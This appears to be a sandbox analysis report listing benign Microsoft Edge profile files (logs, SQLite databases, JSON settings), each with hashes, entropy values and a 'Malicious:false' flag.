                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2200377724746225
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p43vLZYebvqBZFUtL4lh/l4tD54ZYebvqBaJ:7WflYebvygElY3oYebvL
                                                                                                                                                                                                                                                                                                MD5:850FE033D7EA0C5EB0B54368E302D2A2
                                                                                                                                                                                                                                                                                                SHA1:F064D6E44DC2F6BBCBA71129426B9158070D160D
                                                                                                                                                                                                                                                                                                SHA-256:1C060E280CFC9EAD21F28455B50CC2E818D3F0A1ECEE156019F6F0FDC6B8AB52
                                                                                                                                                                                                                                                                                                SHA-512:F68BAEBF084AAAE63FC352CF44F2AE4EE91E840003A56C5517FFA3F82F19E16AC7D9149F5881997250CA193C9E8DE7D3270C9F251818E8F9247D35EB5E18CC55
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:23.605 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/07-07:19:23.608 f70 Recovering log #3.2025/01/07-07:19:23.613 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2200377724746225
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p43vLZYebvqBZFUtL4lh/l4tD54ZYebvqBaJ:7WflYebvygElY3oYebvL
                                                                                                                                                                                                                                                                                                MD5:850FE033D7EA0C5EB0B54368E302D2A2
                                                                                                                                                                                                                                                                                                SHA1:F064D6E44DC2F6BBCBA71129426B9158070D160D
                                                                                                                                                                                                                                                                                                SHA-256:1C060E280CFC9EAD21F28455B50CC2E818D3F0A1ECEE156019F6F0FDC6B8AB52
                                                                                                                                                                                                                                                                                                SHA-512:F68BAEBF084AAAE63FC352CF44F2AE4EE91E840003A56C5517FFA3F82F19E16AC7D9149F5881997250CA193C9E8DE7D3270C9F251818E8F9247D35EB5E18CC55
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:23.605 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/07-07:19:23.608 f70 Recovering log #3.2025/01/07-07:19:23.613 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.186909917571193
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4sq2PcNwi23oH+TcwtpIFUtL47nZmwl471kwOcNwi23oH+Tcwta/WLJ:7p4svLZYebmFUtL4L/l4B54ZYebaUJ
                                                                                                                                                                                                                                                                                                MD5:16BDCCD8A2A3FF35D1DABAB5AAEE50AD
                                                                                                                                                                                                                                                                                                SHA1:F14587DB34DE8303BC811BB64875EE625497AAB4
                                                                                                                                                                                                                                                                                                SHA-256:9E5652773B993352A61243872F2A5E22384B5BF65B6130E26F7FB592263ED197
                                                                                                                                                                                                                                                                                                SHA-512:D839AA88F4320D3C2106F84703B1DDB1E29B445EB83126BDE42D1A19C659B8499CAAA35E0B7EA75BF275B5B2637C9D9FB31AC0A702D6B1A7E93BA1F9B7A75BBD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.049 880 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/07-07:19:03.050 880 Recovering log #3.2025/01/07-07:19:03.050 880 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.186909917571193
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4sq2PcNwi23oH+TcwtpIFUtL47nZmwl471kwOcNwi23oH+Tcwta/WLJ:7p4svLZYebmFUtL4L/l4B54ZYebaUJ
                                                                                                                                                                                                                                                                                                MD5:16BDCCD8A2A3FF35D1DABAB5AAEE50AD
                                                                                                                                                                                                                                                                                                SHA1:F14587DB34DE8303BC811BB64875EE625497AAB4
                                                                                                                                                                                                                                                                                                SHA-256:9E5652773B993352A61243872F2A5E22384B5BF65B6130E26F7FB592263ED197
                                                                                                                                                                                                                                                                                                SHA-512:D839AA88F4320D3C2106F84703B1DDB1E29B445EB83126BDE42D1A19C659B8499CAAA35E0B7EA75BF275B5B2637C9D9FB31AC0A702D6B1A7E93BA1F9B7A75BBD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.049 880 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/07-07:19:03.050 880 Recovering log #3.2025/01/07-07:19:03.050 880 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2653943638295575
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMESAELyKOMq+8HKkjucswRv8p3nVumB:K0q+n0JE9ELyKOMq+8HKkjuczRv891
                                                                                                                                                                                                                                                                                                MD5:BB724FB5E2B97BEFCB28D79E8F295FBF
                                                                                                                                                                                                                                                                                                SHA1:501FEAF1AD21607FC3CCBBB98F35504CF8AC84BA
                                                                                                                                                                                                                                                                                                SHA-256:97ED2184BD1AD5391BF6D9E815B882D0BB3C3100870D9EE1FA4A216940ABE5FF
                                                                                                                                                                                                                                                                                                SHA-512:3C661761B4D95EE66C216B2F629F2751A2A98158C8143E108CD63AD6B997ECDB3F00FB30AB5E9E5E39428BFB67827FC49B7F03F51C691B7130F8D91C8274179B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4667347774854054
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0FQBz:v7doKsKuKZKlZNmu46yjx0WBz
                                                                                                                                                                                                                                                                                                MD5:39D95A0CA85E749B672D3362BA5E3638
                                                                                                                                                                                                                                                                                                SHA1:27C563B44B1AD7FC969C87434C23D8BF2AF18845
                                                                                                                                                                                                                                                                                                SHA-256:9537D7D7200E4913187574A637F4AC67C629F141C1CD01EB169E192772138980
                                                                                                                                                                                                                                                                                                SHA-512:4E0C7968809CC2CACE31B19EE98ADEBDB6A065F5A62944F4B4F414C85E85A40D84F67FBF603DAEAEBA20C606E0735D438773CF80037CA401AB9372C22B1E697E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b1860642-5978-4047-8edd-973aadd80ebd.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17682), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17684
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.488767684721589
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNPtaeN9PktuYUimYwhtngS0e1/Y8EbV+FOdQc:stxPGKSu4wsOztJtHN9mAgy2bGgQwPF
                                                                                                                                                                                                                                                                                                MD5:D574066CC0F499E24BB4D9E0BBBF2A05
                                                                                                                                                                                                                                                                                                SHA1:D9EAE353C79419F2120FB7BA649C859E889E3E57
                                                                                                                                                                                                                                                                                                SHA-256:7D52E6ABAEACB8AEF40AD4CB79BE7F1764C3A711080AA2A71F606A6EB8C386C2
                                                                                                                                                                                                                                                                                                SHA-512:15EC970D96D1E2B596C933EC972F1F250F98DE13DCF6A1D9E677BC20F96484EA50A3F7DFFE5B25B73945E07CE5559BA9809FD8107EBD0D7B3A201172B97563CB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e3ce6bea-d959-4857-a585-b455576a5138.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\eda5043a-a7b1-4bc8-8f76-716124ebf43a.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fa685061-b286-4270-9cb2-3a3506f3818b.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.10251107689299184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:+Y1nLY1nMspEjVl/PnnnnnnnnnnnvoQ/Eou:+uLuJoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                MD5:4635A2FAFF9D4DBBBFD0C028E6B84D84
                                                                                                                                                                                                                                                                                                SHA1:4F694BF27C5749CABB53E86207138CBCC996F2B4
                                                                                                                                                                                                                                                                                                SHA-256:25BD1C2FFC601F0855CC21F90418193C5BF5CB026C7DB617374EAC0DBEAFFC57
                                                                                                                                                                                                                                                                                                SHA-512:BC1B087A31D592373955F6DA98D1DE0C1313A255C0033D75E7EB9F8F3CF4E31693494C5DC9E61CD7BE32B6CA49987379F1817492D7AD5097B5B94B060DF39278
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.............M.......# ......3.-......lG......-.............M.......# ......3.-......lG............I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8885290450125468
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:1rwxrFx7zLxI8XxFCdxP7lyxaMTxrFzx/tMxRSC1TxTtv8EyyyEiyWyWKylhxyZj:C3t/2CXmx7Uoq5l52nH9Qh8
                                                                                                                                                                                                                                                                                                MD5:2CBFAFAC14F6AF3B436BB7B8AC531A6E
                                                                                                                                                                                                                                                                                                SHA1:6C1F4B349AE7AF1B6D8E9A8A6BB52D00A8A4BAD6
                                                                                                                                                                                                                                                                                                SHA-256:44CF7D266F9877E3B425EC022298C60B784FE22B007952478430503E9A56A9B1
                                                                                                                                                                                                                                                                                                SHA-512:81487FBA2624D3F2C24650453CEC9E01192D5D918ED06D9E448E8598429174D30862BE73963957A444DD97EDEC5AA39BE99B2701516FB1519F792F32EDD8AEB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):485
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.0472550700633
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuu564illf3wZEA5PsedhOJ:llc8BOuuuuuuuuuSllf3f88
                                                                                                                                                                                                                                                                                                MD5:951A68B6E28A1015DBDC0EE09DD5D212
                                                                                                                                                                                                                                                                                                SHA1:4FCF0EE63D583E836457488469699C762676A561
                                                                                                                                                                                                                                                                                                SHA-256:F952F3942016745B4B0D06547E12A3332DC74510AFE57F5B5D36C73618A2D292
                                                                                                                                                                                                                                                                                                SHA-512:AFF42C94D1351AA9D7125BB7B5FC146D59F064172B8F0D398F12FE8BFAE75A922B0DE41E3910D3B916CC2D30D42CDB0EAE1AAA78EA07521E338A20E5773D714F
                                                                                                                                                                                                                                                                                                Malicious:false
